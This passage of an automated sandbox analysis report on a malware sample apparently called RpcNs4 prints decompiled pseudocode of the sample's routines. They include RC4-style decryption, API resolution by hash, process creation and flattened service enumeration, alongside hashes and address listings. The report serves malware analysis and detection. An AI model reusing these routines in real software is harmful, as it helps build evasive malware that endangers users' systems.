                                                                                                      0x020b308b
                                                                                                      0x020b3129
                                                                                                      0x020b3131
                                                                                                      0x020b3149
                                                                                                      0x020b314b
                                                                                                      0x020b314b
                                                                                                      0x020b3157
                                                                                                      0x020b3159
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b3091
                                                                                                      0x020b3096
                                                                                                      0x020b30bf
                                                                                                      0x020b30c6
                                                                                                      0x020b30d9
                                                                                                      0x020b30de
                                                                                                      0x020b30de
                                                                                                      0x020b30e5
                                                                                                      0x020b30ee
                                                                                                      0x020b3106
                                                                                                      0x020b3106
                                                                                                      0x020b3113
                                                                                                      0x020b3115
                                                                                                      0x020b3119
                                                                                                      0x00000000
                                                                                                      0x020b311f
                                                                                                      0x020b311f
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x020b3098
                                                                                                      0x020b309d
                                                                                                      0x020b3255
                                                                                                      0x020b325d
                                                                                                      0x020b3275
                                                                                                      0x020b3277
                                                                                                      0x020b3277
                                                                                                      0x020b328e
                                                                                                      0x020b3290
                                                                                                      0x020b3297
                                                                                                      0x020b329d
                                                                                                      0x020b32a0
                                                                                                      0x00000000
                                                                                                      0x020b30a3
                                                                                                      0x020b30a8
                                                                                                      0x00000000
                                                                                                      0x020b30ae
                                                                                                      0x020b30b2
                                                                                                      0x020b32a6
                                                                                                      0x020b32ad
                                                                                                      0x020b30b8
                                                                                                      0x020b30b8
                                                                                                      0x00000000
                                                                                                      0x020b30b8
                                                                                                      0x020b30b2
                                                                                                      0x020b30a8
                                                                                                      0x020b309d
                                                                                                      0x020b3096
                                                                                                      0x00000000
                                                                                                      0x020b308b
                                                                                                      0x020b3168
                                                                                                      0x020b31b6
                                                                                                      0x020b31be
                                                                                                      0x020b31c3
                                                                                                      0x020b31d0
                                                                                                      0x020b31d9
                                                                                                      0x020b31e1
                                                                                                      0x020b31fd
                                                                                                      0x020b3201
                                                                                                      0x020b3209
                                                                                                      0x020b3211
                                                                                                      0x020b3217
                                                                                                      0x020b3225
                                                                                                      0x020b3229
                                                                                                      0x020b322e
                                                                                                      0x020b3236
                                                                                                      0x020b323b
                                                                                                      0x020b3243
                                                                                                      0x020b3248
                                                                                                      0x00000000
                                                                                                      0x020b316a
                                                                                                      0x020b316f
                                                                                                      0x020b31aa
                                                                                                      0x020b31ac
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b3171
                                                                                                      0x020b3176
                                                                                                      0x00000000
                                                                                                      0x020b3178
                                                                                                      0x020b3183
                                                                                                      0x00000000
                                                                                                      0x020b3183
                                                                                                      0x020b3176
                                                                                                      0x020b316f
                                                                                                      0x00000000
                                                                                                      0x020b318b
                                                                                                      0x020b318b
                                                                                                      0x020b31a0
                                                                                                      0x00000000
                                                                                                      0x020b31a0

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,0000023C), ref: 020B3113
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID: *SF'$*SF'
                                                                                                      • API String ID: 1279760036-2165348068
                                                                                                      • Opcode ID: f2b674458fbbe6a5eda6e775847fbdd22a12bf858c3579e23d7a2e521a1f86ef
                                                                                                      • Instruction ID: 23e998595922a2dfa47119039816650fda5546f11d0674cc4e68e55387db84df
                                                                                                      • Opcode Fuzzy Hash: f2b674458fbbe6a5eda6e775847fbdd22a12bf858c3579e23d7a2e521a1f86ef
                                                                                                      • Instruction Fuzzy Hash: BE51D271B043028BC76EDF6894942AEBBE6BFD8240F204D6EE452C7350DB70D9499BD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 310 402190-4021b9 call 4025d7 * 2 315 4021e7-4021eb 310->315 316 4021bb-4021bd 310->316 317 40222d-402238 315->317 318 4021ed-4021fc 315->318 319 4021c0-4021e0 316->319 322 4022a9-4022af 317->322 323 40223a-402243 317->323 321 402200-402228 318->321 319->319 320 4021e2-4021e5 319->320 320->315 321->321 324 40222a 321->324 325 402246-40229c ShowWindow 323->325 324->317 325->322 326 40229e-4022a7 325->326 326->325
                                                                                                      C-Code - Quality: 98%
                                                                                                      			E00402190(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, signed int _a16, signed char* _a20) {
                                                                                                      				signed char _v8;
                                                                                                      				signed int _v12;
                                                                                                      				struct HWND__* _v16;
                                                                                                      				intOrPtr _v20;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* _t70;
                                                                                                      				signed char _t71;
                                                                                                      				signed int _t85;
                                                                                                      				struct HWND__* _t90;
                                                                                                      				signed int _t91;
                                                                                                      				void* _t94;
                                                                                                      				void* _t95;
                                                                                                      				signed char _t96;
                                                                                                      				signed char _t98;
                                                                                                      				signed int _t99;
                                                                                                      				signed int _t100;
                                                                                                      				signed char _t101;
                                                                                                      				signed char* _t103;
                                                                                                      				signed char _t107;
                                                                                                      				void* _t108;
                                                                                                      				signed int _t109;
                                                                                                      				signed int _t113;
                                                                                                      				signed int _t119;
                                                                                                      				signed int _t121;
                                                                                                      				signed char _t123;
                                                                                                      				char* _t124;
                                                                                                      
                                                                                                      				_t119 =  *0x43502c; // 0x6700
                                                                                                      				_t70 = E004025D7(_t94, _t108, _t119, _t119); // executed
                                                                                                      				_t95 = _t70; // executed
                                                                                                      				_t71 = E004025D7(_t95, _t108, _t119, _t119); // executed
                                                                                                      				_v8 = _t71;
                                                                                                      				_t109 = 0;
                                                                                                      				_t99 = 0;
                                                                                                      				if(_t119 != 0) {
                                                                                                      					_t90 = _t71 - _t95;
                                                                                                      					_v16 = _t90;
                                                                                                      					do {
                                                                                                      						_t124 = _t99 + _t95;
                                                                                                      						 *(_t90 + _t124) = _t99;
                                                                                                      						_t91 = _t99;
                                                                                                      						asm("cdq");
                                                                                                      						_t99 = _t99 + 1;
                                                                                                      						_t119 =  *0x43502c; // 0x6700
                                                                                                      						 *_t124 =  *((intOrPtr*)(_t91 % _a16 + _a12));
                                                                                                      						_t90 = _v16;
                                                                                                      					} while (_t99 < _t119);
                                                                                                      					_t71 = _v8;
                                                                                                      					_t109 = 0;
                                                                                                      				}
                                                                                                      				_t100 = 0;
                                                                                                      				if(_t119 != 0) {
                                                                                                      					_t123 = _t71;
                                                                                                      					_t85 = _t119;
                                                                                                      					_v20 = _t95 - _t71;
                                                                                                      					_v16 = _t85;
                                                                                                      					_v12 = _t85;
                                                                                                      					do {
                                                                                                      						_t123 = _t123 + 1;
                                                                                                      						_t98 =  *(_t123 - 1);
                                                                                                      						_t109 = ((_t98 & 0x000000ff) + ( *(_v20 + _t123 - 1) & 0x000000ff) + _t109) % _t119;
                                                                                                      						_t27 =  &_v16;
                                                                                                      						 *_t27 = _v16 - 1;
                                                                                                      						_t107 = _v8;
                                                                                                      						_t71 =  *(_t109 + _t107);
                                                                                                      						 *(_t109 + _t107) = _t98;
                                                                                                      						 *(_t123 - 1) = _t71;
                                                                                                      					} while ( *_t27 != 0);
                                                                                                      					_t100 = _v12;
                                                                                                      				}
                                                                                                      				_v16 = 0;
                                                                                                      				if(_a8 > 0) {
                                                                                                      					_t96 = _v8;
                                                                                                      					_a4 = _a4 - _a20;
                                                                                                      					while(1) {
                                                                                                      						_t40 = _t100 + 1; // 0x1
                                                                                                      						_t121 = _t40 % _t119;
                                                                                                      						_v12 = _t121;
                                                                                                      						_t113 = (_v16 + ( *(_t121 + _t96) & 0x000000ff)) % _t119;
                                                                                                      						_v16 = _t113;
                                                                                                      						_t101 =  *(_t113 + _t96);
                                                                                                      						 *(_t113 + _t96) =  *(_t121 + _t96) & 0x000000ff;
                                                                                                      						 *(_t121 + _t96) = _t101;
                                                                                                      						ShowWindow(0, 0); // executed
                                                                                                      						_t103 = _a20;
                                                                                                      						_t71 =  *(_a4 + _t103) & 0x000000ff ^  *(((_t101 & 0x000000ff) + ( *(_t113 + _t96) & 0x000000ff)) % _t119 + _t96);
                                                                                                      						 *_t103 = _t71;
                                                                                                      						_t66 =  &_a8;
                                                                                                      						 *_t66 = _a8 - 1;
                                                                                                      						_a20 =  &(_t103[1]);
                                                                                                      						if( *_t66 == 0) {
                                                                                                      							goto L12;
                                                                                                      						}
                                                                                                      						_t119 =  *0x43502c; // 0x6700
                                                                                                      						_t100 = _v12;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				L12:
                                                                                                      				return _t71;
                                                                                                      			}






























                                                                                                      0x00402199
                                                                                                      0x004021a0
                                                                                                      0x004021a6
                                                                                                      0x004021a8
                                                                                                      0x004021b0
                                                                                                      0x004021b3
                                                                                                      0x004021b5
                                                                                                      0x004021b9
                                                                                                      0x004021bb
                                                                                                      0x004021bd
                                                                                                      0x004021c0
                                                                                                      0x004021c0
                                                                                                      0x004021c6
                                                                                                      0x004021c9
                                                                                                      0x004021cb
                                                                                                      0x004021cc
                                                                                                      0x004021d3
                                                                                                      0x004021d9
                                                                                                      0x004021db
                                                                                                      0x004021de
                                                                                                      0x004021e2
                                                                                                      0x004021e5
                                                                                                      0x004021e5
                                                                                                      0x004021e7
                                                                                                      0x004021eb
                                                                                                      0x004021ef
                                                                                                      0x004021f1
                                                                                                      0x004021f3
                                                                                                      0x004021f6
                                                                                                      0x004021f9
                                                                                                      0x00402200
                                                                                                      0x00402203
                                                                                                      0x00402206
                                                                                                      0x00402217
                                                                                                      0x00402219
                                                                                                      0x00402219
                                                                                                      0x0040221c
                                                                                                      0x0040221f
                                                                                                      0x00402222
                                                                                                      0x00402225
                                                                                                      0x00402225
                                                                                                      0x0040222a
                                                                                                      0x0040222a
                                                                                                      0x00402231
                                                                                                      0x00402238
                                                                                                      0x00402240
                                                                                                      0x00402243
                                                                                                      0x00402246
                                                                                                      0x00402248
                                                                                                      0x0040224f
                                                                                                      0x00402253
                                                                                                      0x0040225f
                                                                                                      0x00402265
                                                                                                      0x00402268
                                                                                                      0x0040226b
                                                                                                      0x0040226e
                                                                                                      0x00402280
                                                                                                      0x00402286
                                                                                                      0x00402290
                                                                                                      0x00402293
                                                                                                      0x00402296
                                                                                                      0x00402296
                                                                                                      0x00402299
                                                                                                      0x0040229c
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040229e
                                                                                                      0x004022a4
                                                                                                      0x004022a4
                                                                                                      0x00402246
                                                                                                      0x004022af
                                                                                                      0x004022af

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 004021A0
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00610000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • _malloc.LIBCMT ref: 004021A8
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00402280
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$AllocateHeapShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029182426-0
                                                                                                      • Opcode ID: 414393e4c0a2ca2fefc8c6585836cd36396bea82b3bbe22be38456031dbfa9e9
                                                                                                      • Instruction ID: c59e8e181be4432f579234cb94a6521dd56dcdf708861cff6199d573f643a35f
                                                                                                      • Opcode Fuzzy Hash: 414393e4c0a2ca2fefc8c6585836cd36396bea82b3bbe22be38456031dbfa9e9
                                                                                                      • Instruction Fuzzy Hash: CE41C635D042559FCB15CF6AC8906AEFFF1AF9A310F1880AED894AB342C6759A41CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 60%
                                                                                                      			E020B4AE0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                                                                      				struct _STARTUPINFOW _v72;
                                                                                                      				struct _PROCESS_INFORMATION _v88;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				int _t12;
                                                                                                      				intOrPtr* _t15;
                                                                                                      				intOrPtr* _t17;
                                                                                                      				WCHAR* _t44;
                                                                                                      				WCHAR* _t45;
                                                                                                      
                                                                                                      				_t46 = __ebp;
                                                                                                      				_t26 = __ebx;
                                                                                                      				_t9 =  *0x20bdee8;
                                                                                                      				_t45 = __edx;
                                                                                                      				_t44 = __ecx;
                                                                                                      				if(_t9 == 0) {
                                                                                                      					_t9 = E020B3DD0(__ebx, E020B3E70(0xe60124ba), 0x2828b361, __ebp);
                                                                                                      					 *0x20bdee8 = _t9;
                                                                                                      				}
                                                                                                      				 *_t9( &_v72, 0, 0x44);
                                                                                                      				_v72.cb = 0x44;
                                                                                                      				if( *0x20be1d4 == 0) {
                                                                                                      					 *0x20be1d4 = E020B3DD0(_t26, E020B3E70(0xbb51e2dc), 0xeb4e9e48, _t46);
                                                                                                      				}
                                                                                                      				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                                                                      				if(_t12 == 0) {
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					if(_a12 == 0) {
                                                                                                      						_t15 =  *0x20bde38;
                                                                                                      						if(_t15 == 0) {
                                                                                                      							_t15 = E020B3DD0(_t26, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t46);
                                                                                                      							 *0x20bde38 = _t15;
                                                                                                      						}
                                                                                                      						 *_t15(_v88.hProcess);
                                                                                                      						_t17 =  *0x20bde38;
                                                                                                      						if(_t17 == 0) {
                                                                                                      							_t17 = E020B3DD0(_t26, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t46);
                                                                                                      							 *0x20bde38 = _t17;
                                                                                                      						}
                                                                                                      						 *_t17(_v88.hProcess);
                                                                                                      						return 1;
                                                                                                      					} else {
                                                                                                      						asm("movdqu xmm0, [esp+0x8]");
                                                                                                      						asm("movdqu [eax], xmm0");
                                                                                                      						return 1;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}











                                                                                                      0x020b4ae0
                                                                                                      0x020b4ae0
                                                                                                      0x020b4ae0
                                                                                                      0x020b4ae9
                                                                                                      0x020b4aec
                                                                                                      0x020b4af0
                                                                                                      0x020b4b03
                                                                                                      0x020b4b08
                                                                                                      0x020b4b08
                                                                                                      0x020b4b16
                                                                                                      0x020b4b20
                                                                                                      0x020b4b2a
                                                                                                      0x020b4b42
                                                                                                      0x020b4b42
                                                                                                      0x020b4b61
                                                                                                      0x020b4b65
                                                                                                      0x020b4bea
                                                                                                      0x020b4b67
                                                                                                      0x020b4b6d
                                                                                                      0x020b4b84
                                                                                                      0x020b4b8b
                                                                                                      0x020b4b9e
                                                                                                      0x020b4ba3
                                                                                                      0x020b4ba3
                                                                                                      0x020b4bac
                                                                                                      0x020b4bae
                                                                                                      0x020b4bb5
                                                                                                      0x020b4bc8
                                                                                                      0x020b4bcd
                                                                                                      0x020b4bcd
                                                                                                      0x020b4bd6
                                                                                                      0x020b4be2
                                                                                                      0x020b4b6f
                                                                                                      0x020b4b6f
                                                                                                      0x020b4b75
                                                                                                      0x020b4b83
                                                                                                      0x020b4b83
                                                                                                      0x020b4b6d

                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 020B4B61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID: D
                                                                                                      • API String ID: 963392458-2746444292
                                                                                                      • Opcode ID: 3abbb888954d457db7fd31b51ee88276415093657864aa7ca08a3aaf5d1d8484
                                                                                                      • Instruction ID: 547c65e0a0d81ffa2a2836840e5111975d29cd83a6a087f1251c66d335b945b2
                                                                                                      • Opcode Fuzzy Hash: 3abbb888954d457db7fd31b51ee88276415093657864aa7ca08a3aaf5d1d8484
                                                                                                      • Instruction Fuzzy Hash: 8621D6397003015BE73BAB68DC91BEB73D6AFC0750F200879B654CB280EA74DD509B41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 359 20b4fb0-20b4fc7 360 20b4fcc 359->360 361 20b4fd0-20b4fd6 360->361 362 20b51ee-20b51f4 361->362 363 20b4fdc 361->363 366 20b51fa 362->366 367 20b52cc-20b52d2 362->367 364 20b4fe2-20b4fe8 363->364 365 20b51d6-20b51e9 363->365 368 20b50a8-20b50ae 364->368 369 20b4fee 364->369 365->361 372 20b51fc-20b5202 366->372 373 20b5270-20b5277 366->373 370 20b52d8-20b52dd 367->370 371 20b51c5-20b51cb 367->371 382 20b5154-20b515b 368->382 383 20b50b4-20b50ba 368->383 376 20b503c-20b5043 369->376 377 20b4ff0-20b4ff6 369->377 370->361 374 20b52e9-20b52f0 371->374 375 20b51d1 371->375 380 20b522a-20b5231 372->380 381 20b5204-20b520a 372->381 378 20b5279-20b528f call 20b3e70 call 20b3dd0 373->378 379 20b5294-20b529f 373->379 375->360 392 20b5060-20b506b 376->392 393 20b5045-20b505b call 20b3e70 call 20b3dd0 376->393 386 20b4ffc-20b5002 377->386 387 20b52e2-20b52e4 call 20b4180 377->387 378->379 414 20b52bc-20b52c7 379->414 415 20b52a1-20b52b7 call 20b3e70 call 20b3dd0 379->415 390 20b524e-20b526b OpenServiceW 380->390 391 20b5233-20b5249 call 20b3e70 call 20b3dd0 380->391 381->371 389 20b520c-20b521a call 20b4220 381->389 384 20b5178-20b51a2 382->384 385 20b515d-20b5173 call 20b3e70 call 20b3dd0 382->385 383->371 394 20b50c0-20b50c7 383->394 422 20b51bf 384->422 423 20b51a4-20b51ba call 20b3e70 call 20b3dd0 384->423 385->384 386->371 396 20b5008-20b500f 386->396 387->374 389->374 428 20b5220-20b5225 389->428 390->360 391->390 419 20b5088-20b50a3 RtlAllocateHeap 392->419 420 20b506d-20b5083 call 20b3e70 call 20b3dd0 392->420 393->392 403 20b50c9-20b50df call 20b3e70 call 20b3dd0 394->403 404 20b50e4-20b5106 394->404 408 20b502c-20b502f 396->408 409 20b5011-20b5027 call 20b3e70 call 20b3dd0 396->409 403->404 439 20b510c-20b5113 404->439 440 20b5035-20b503a 404->440 408->440 409->408 414->360 415->414 419->360 420->419 422->371 423->422 428->360 446 20b5130-20b514f 439->446 447 20b5115-20b512b call 20b3e70 call 20b3dd0 439->447 440->360 446->361 447->446
                                                                                                      C-Code - Quality: 67%
                                                                                                      			E020B4FB0(void* __ecx, intOrPtr __edx) {
                                                                                                      				char _v4;
                                                                                                      				char _v8;
                                                                                                      				short** _v12;
                                                                                                      				intOrPtr _v16;
                                                                                                      				void* _v20;
                                                                                                      				void* _v24;
                                                                                                      				void* _v28;
                                                                                                      				intOrPtr _v44;
                                                                                                      				signed int _v52;
                                                                                                      				void* _v68;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t16;
                                                                                                      				void* _t17;
                                                                                                      				void* _t20;
                                                                                                      				void* _t23;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				signed int _t26;
                                                                                                      				void* _t29;
                                                                                                      				void* _t32;
                                                                                                      				intOrPtr* _t38;
                                                                                                      				void* _t41;
                                                                                                      				void* _t43;
                                                                                                      				void* _t48;
                                                                                                      				void* _t54;
                                                                                                      				short** _t92;
                                                                                                      				void* _t94;
                                                                                                      				signed int _t95;
                                                                                                      				void* _t96;
                                                                                                      				void* _t100;
                                                                                                      				void* _t102;
                                                                                                      				void* _t105;
                                                                                                      				void* _t106;
                                                                                                      
                                                                                                      				_t92 = _v12;
                                                                                                      				_t102 = 0;
                                                                                                      				_v16 = __edx;
                                                                                                      				_t54 = 0;
                                                                                                      				_v20 = __ecx;
                                                                                                      				_t95 = 0x3725d924;
                                                                                                      				while(1) {
                                                                                                      					_t16 = _v28;
                                                                                                      					while(1) {
                                                                                                      						L2:
                                                                                                      						_t105 = _t95 - 0x1893822c;
                                                                                                      						if(_t105 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t105 == 0) {
                                                                                                      							_t92 =  &(_t92[0xb]);
                                                                                                      							__eflags = _t92 - _t16;
                                                                                                      							asm("sbb esi, esi");
                                                                                                      							_t95 = (_t95 & 0xf62ca62c) + 0x2ed4c8c2;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							_t106 = _t95 - 0x109aede1;
                                                                                                      							if(_t106 > 0) {
                                                                                                      								__eflags = _t95 - 0x1485f6c7;
                                                                                                      								if(_t95 == 0x1485f6c7) {
                                                                                                      									_t17 =  *0x20bdf50;
                                                                                                      									__eflags = _t17;
                                                                                                      									if(_t17 == 0) {
                                                                                                      										_t17 = E020B3DD0(_t54, E020B3E70(0x60f9cb2), 0xc8b38db8, _t102);
                                                                                                      										 *0x20bdf50 = _t17;
                                                                                                      									}
                                                                                                      									 *_t17(_v24, 1, _t54, 0x2000,  &_v4);
                                                                                                      									asm("sbb esi, esi");
                                                                                                      									_t20 =  *0x20bdd78;
                                                                                                      									_t95 = (_t95 & 0xf5ae1ac4) + 0x1893822c;
                                                                                                      									__eflags = _t20;
                                                                                                      									if(_t20 == 0) {
                                                                                                      										_t20 = E020B3DD0(_t54, E020B3E70(0x60f9cb2), 0x70adb3c9, _t102);
                                                                                                      										 *0x20bdd78 = _t20;
                                                                                                      									}
                                                                                                      									_t16 =  *_t20(_v44);
                                                                                                      									goto L30;
                                                                                                      								} else {
                                                                                                      									__eflags = _t95 - 0x14ada14f;
                                                                                                      									if(_t95 != 0x14ada14f) {
                                                                                                      										goto L30;
                                                                                                      									} else {
                                                                                                      										_t23 =  *0x20be1e8;
                                                                                                      										__eflags = _t23;
                                                                                                      										if(_t23 == 0) {
                                                                                                      											_t23 = E020B3DD0(_t54, E020B3E70(0x60f9cb2), 0x52751a5f, _t102);
                                                                                                      											 *0x20be1e8 = _t23;
                                                                                                      										}
                                                                                                      										_t24 =  *_t23(_v20, 0, 0x30, 3, _t102, 0x20000,  &_v8,  &_v12, 0, 0);
                                                                                                      										__eflags = _t24;
                                                                                                      										if(_t24 == 0) {
                                                                                                      											goto L11;
                                                                                                      										} else {
                                                                                                      											_t25 =  *0x20bdc10;
                                                                                                      											__eflags = _t25;
                                                                                                      											if(_t25 == 0) {
                                                                                                      												_t25 = E020B3DD0(_t54, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t102);
                                                                                                      												 *0x20bdc10 = _t25;
                                                                                                      											}
                                                                                                      											_t26 =  *_t25();
                                                                                                      											_t95 = 0x25016eee;
                                                                                                      											_t94 = _t102 + (_t26 & 0x0000001f) * 0x2c;
                                                                                                      											_t16 = _t102 + _v52 * 0x2c;
                                                                                                      											__eflags = _t94 - _t16;
                                                                                                      											_v68 = _t16;
                                                                                                      											_t92 =  >=  ? _t102 : _t94;
                                                                                                      											continue;
                                                                                                      										}
                                                                                                      										L51:
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t106 == 0) {
                                                                                                      									_t29 =  *0x20bddc8;
                                                                                                      									__eflags = _t29;
                                                                                                      									if(_t29 == 0) {
                                                                                                      										_t29 = E020B3DD0(_t54, E020B3E70(0xbb51e2dc), 0x298e8809, _t102);
                                                                                                      										 *0x20bddc8 = _t29;
                                                                                                      									}
                                                                                                      									_t100 =  *_t29();
                                                                                                      									__eflags =  *0x20bdcf0;
                                                                                                      									if( *0x20bdcf0 == 0) {
                                                                                                      										 *0x20bdcf0 = E020B3DD0(_t54, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t102);
                                                                                                      									}
                                                                                                      									_t32 = RtlAllocateHeap(_t100, 8, 0x2000); // executed
                                                                                                      									_t54 = _t32;
                                                                                                      									__eflags = _t54;
                                                                                                      									_t95 =  !=  ? 0x14ada14f : 0x556bd9c;
                                                                                                      									while(1) {
                                                                                                      										_t16 = _v28;
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									if(_t95 == 0x556bd9c) {
                                                                                                      										return E020B4180(_t54, _t102);
                                                                                                      									}
                                                                                                      									if(_t95 != 0xe419cf0) {
                                                                                                      										L30:
                                                                                                      										__eflags = _t95 - 0x10f58482;
                                                                                                      										if(_t95 != 0x10f58482) {
                                                                                                      											while(1) {
                                                                                                      												_t16 = _v28;
                                                                                                      												goto L2;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										_t38 =  *0x20be220;
                                                                                                      										if(_t38 == 0) {
                                                                                                      											_t38 = E020B3DD0(_t54, E020B3E70(0x60f9cb2), 0x40f65e00, _t102);
                                                                                                      											 *0x20be220 = _t38;
                                                                                                      										}
                                                                                                      										 *_t38(_v16, 1, _t54);
                                                                                                      										L11:
                                                                                                      										_t95 = 0x2ed4c8c2;
                                                                                                      										while(1) {
                                                                                                      											_t16 = _v28;
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L50:
                                                                                                      						return _t16;
                                                                                                      						goto L51;
                                                                                                      					}
                                                                                                      					__eflags = _t95 - 0x2ed4c8c2;
                                                                                                      					if(__eflags > 0) {
                                                                                                      						__eflags = _t95 - 0x3725d924;
                                                                                                      						if(_t95 != 0x3725d924) {
                                                                                                      							goto L30;
                                                                                                      						} else {
                                                                                                      							_t95 = 0x25c43419;
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(__eflags == 0) {
                                                                                                      							_t41 =  *0x20bddc8;
                                                                                                      							__eflags = _t41;
                                                                                                      							if(_t41 == 0) {
                                                                                                      								_t41 = E020B3DD0(_t54, E020B3E70(0xbb51e2dc), 0x298e8809, _t102);
                                                                                                      								 *0x20bddc8 = _t41;
                                                                                                      							}
                                                                                                      							_t96 =  *_t41();
                                                                                                      							_t43 =  *0x20bdbec;
                                                                                                      							__eflags = _t43;
                                                                                                      							if(_t43 == 0) {
                                                                                                      								_t43 = E020B3DD0(_t54, E020B3E70(0xbb51e2dc), 0x632f374, _t102);
                                                                                                      								 *0x20bdbec = _t43;
                                                                                                      							}
                                                                                                      							 *_t43(_t96, 0, _t54);
                                                                                                      							_t95 = 0x556bd9c;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							__eflags = _t95 - 0x25016eee;
                                                                                                      							if(_t95 == 0x25016eee) {
                                                                                                      								__eflags =  *0x20be2dc;
                                                                                                      								if( *0x20be2dc == 0) {
                                                                                                      									 *0x20be2dc = E020B3DD0(_t54, E020B3E70(0x60f9cb2), 0xc066c0, _t102);
                                                                                                      								}
                                                                                                      								_t48 = OpenServiceW(_v20,  *_t92, 1); // executed
                                                                                                      								__eflags = _t48;
                                                                                                      								_v24 = _t48;
                                                                                                      								_t95 =  !=  ? 0x1485f6c7 : 0x1893822c;
                                                                                                      								while(1) {
                                                                                                      									_t16 = _v28;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								__eflags = _t95 - 0x25c43419;
                                                                                                      								if(_t95 != 0x25c43419) {
                                                                                                      									goto L30;
                                                                                                      								} else {
                                                                                                      									_t16 = E020B4220(_t54, 0x20000);
                                                                                                      									_t102 = _t16;
                                                                                                      									__eflags = _t102;
                                                                                                      									if(_t102 != 0) {
                                                                                                      										_t95 = 0x109aede1;
                                                                                                      										while(1) {
                                                                                                      											_t16 = _v28;
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L50;
                                                                                                      				}
                                                                                                      			}





































